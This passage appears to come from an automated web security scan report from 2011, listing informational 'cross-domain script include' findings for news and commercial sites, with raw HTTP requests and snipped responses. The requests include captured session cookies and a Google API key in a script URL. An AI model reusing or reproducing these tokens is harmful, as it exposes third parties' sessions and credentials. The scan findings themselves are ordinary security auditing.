The response dynamically includes the following scripts from other domains:

Request

GET /sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791 HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=D9FF293318E2FE6482ABC137988F4175DB56AFA2CC3F3B2903E14FEE4B354E391D38E27D538AAB9D939069DEBE0F6AD1AE83965EDE23FBFAE2AB03A236DF6291C879D568A9; __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 03:08:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 45463
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- GAM -->
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d8.zedo.com/jsc/d8/fo.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- footer ends -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.81. http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811 HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=D9FF293318E2FE6482ABC137988F4175DB56AFA2CC3F3B2903E14FEE4B354E391D38E27D538AAB9D939069DEBE0F6AD1AE83965EDE23FBFAE2AB03A236DF6291C879D568A9; __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmb=248229458; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 03:09:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 45031
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- GAM -->
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d8.zedo.com/jsc/d8/fo.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- footer ends -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.82. http://www.dnaindia.com/world  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /world

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /world HTTP/1.1
Host: www.dnaindia.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=D9FF293318E2FE6482ABC137988F4175DB56AFA2CC3F3B2903E14FEE4B354E391D38E27D538AAB9D939069DEBE0F6AD1AE83965EDE23FBFAE2AB03A236DF6291C879D568A9; __gads=ID=1063ad11e8c8983a:T=1315103138:S=ALNI_MZLAgHk-KRcEjPEIBIf8NJ_VstEbg; __utmc=248229458; __utma=248229458.440785124.1315103176.1315103176.1315103176.1; __utmz=248229458.1315103178.1.1.utmccn=(organic)|utmcsr=google|utmctr=bangkok+thailand+news#sclient=psy|utmcmd=organic; PHPSESSID=ja953u85brl5fup65sknnkg435; DNA=1; __utmb=248229458

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 03:33:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 24938
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org
...[SNIP]...
<!-- GAM -->
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d8.zedo.com/jsc/d8/fo.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<!-- footer ends -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.83. http://www.egnyte.com/corp/lp1/FTP-site-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egnyte.com
Path:   /corp/lp1/FTP-site-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /corp/lp1/FTP-site-2.html HTTP/1.1
Host: www.egnyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:29:30 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 16700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Google Website Op
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

22.84. https://www.google.com/adsense/support/bin/request.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D799abfc4d86c130b%26v%3D2%26c%3De08e7d44%26s%3D4e6300ee%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 04-Sep-2011 05:09:10 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:39:10 GMT
Expires: Sun, 04 Sep 2011 04:39:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"
class="">
<head>
<pre style="font-size: 0;display: none;visibility: hidden;">


</pre>
<scrip
...[SNIP]...
</script>
<script src='//ssl.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

22.85. http://www.isomedia.com/business-vps.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.isomedia.com
Path:   /business-vps.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-vps.shtml HTTP/1.1
Host: www.isomedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:39:38 GMT
Server: Apache/2.0.52 (CentOS)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Virtual Private Ser
...[SNIP]...
<div id="container">
       <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

22.86. http://www.magicbricks.com/bricks/propertySearch.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magicbricks.com
Path:   /bricks/propertySearch.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bricks/propertySearch.html HTTP/1.1
Host: www.magicbricks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:39:47 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
Content-Language: en
X-Mod-Pagespeed: 0.9.17.7-716
Vary: Accept-Encoding
Content-Length: 69386
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">



...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://115.112.206.35/feedback/scripts/feedbackInc.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

22.87. http://www.magicbricks.com/bricks/viewProperty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magicbricks.com
Path:   /bricks/viewProperty.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bricks/viewProperty.html HTTP/1.1
Host: www.magicbricks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 04:39:44 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31 mod_perl/2.0.5 Perl/v5.8.8
Set-Cookie: JSESSIONID=mCVxbZ3c1OGcp3I81tPbJg**.MBAPP04; Path=/
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 77937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">



...[SNIP]...
</script>
<script type="text/javascript" src="http://115.112.206.35/feedback/scripts/feedbackInc.js">

</script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

22.88. http://www.mid-day.com/news/index.htm/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mid-day.com
Path:   /news/index.htm/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:27 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>National News, In
...[SNIP]...
</script>
<script language="JavaScript" src="http://d8.zedo.com/jsc/d8/fo.js"></script>
...[SNIP]...
</form><script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
                                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                   </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
               <script language='JavaScript' src='http://d8.zedo.com/jsc/d8/fo.js'></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d8.zedo.com/jsc/d8/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.innity.com/network.js    "></script>
...[SNIP]...

22.89. http://www.mid-day.com/news/local/index.htm/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mid-day.com
Path:   /news/local/index.htm/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/local/index.htm/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:21 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local News - Nati
...[SNIP]...
</script>
<script language="JavaScript" src="http://d8.zedo.com/jsc/d8/fo.js"></script>
...[SNIP]...
</script>
                                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                   </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.innity.com/network.js    "></script>
...[SNIP]...

22.90. http://www.mumbaimirror.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mumbaimirror.com
Path:   /index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.aspx HTTP/1.1
Host: www.mumbaimirror.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 05:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Cache-Control: private
Expires: Sun, 04 Sep 2011 05:15:39 GMT
Content-Type: text/html
Content-Length: 143494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</form>
       <script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<!-- PUT THIS TAG IN THE head SECTION -->
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div id="rightcontentarea">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

22.91. http://www.nationmultimedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 68597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us
...[SNIP]...
<!-- google feed API -->
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA3fZmu9B2WU-A-l1mLKlejBSQCG4D4HpDJwxwLX_QO1RQmiJQ8RQfUK6tILSE5merCclrL8RNsO0EOQ">
</script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002761.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=63'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=63'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.92. http://www.nationmultimedia.com/breakingnews/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /breakingnews/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /breakingnews/ HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.1.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103167.1315103167.; _pk_ses..5669=*

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:46:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 34286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002761.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.93. http://www.nationmultimedia.com/home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ee11f5b4b737c3323629b9e202024e62e18088e413-981323754e62e1f6; _em_v=1fc94de23a9888bf29e50d7277324e62e18088e4f8-084548474e62e1f6; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.2.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103271.1315103167.; _pk_ses..5669=*

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:39:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 24549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002761.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=xa-4ae5585728b661e8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.94. http://www.nationmultimedia.com/home/banner/125x125_food.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/banner/125x125_food.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/banner/125x125_food.htm HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:26:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 15 Nov 2010 11:24:02 GMT
ETag: "1f3a66e-420-ad593880"
Accept-Ranges: bytes
_ontent-Length: 1056
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 1056

<!-- 125x125 Food and Agriculture -->
<script language='JavaScript' type='text/javascript' src='http://ads.nationchannel.com/adserverchannel/adx.js'></script>
<script language='JavaScript' type='tex
...[SNIP]...

22.95. http://www.nationmultimedia.com/home/banner/ad_set1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/banner/ad_set1.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/banner/ad_set1.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 31 May 2011 09:38:31 GMT
ETag: "1b2b289-c43-2abab3c0"
Accept-Ranges: bytes
_ontent-Length: 3139
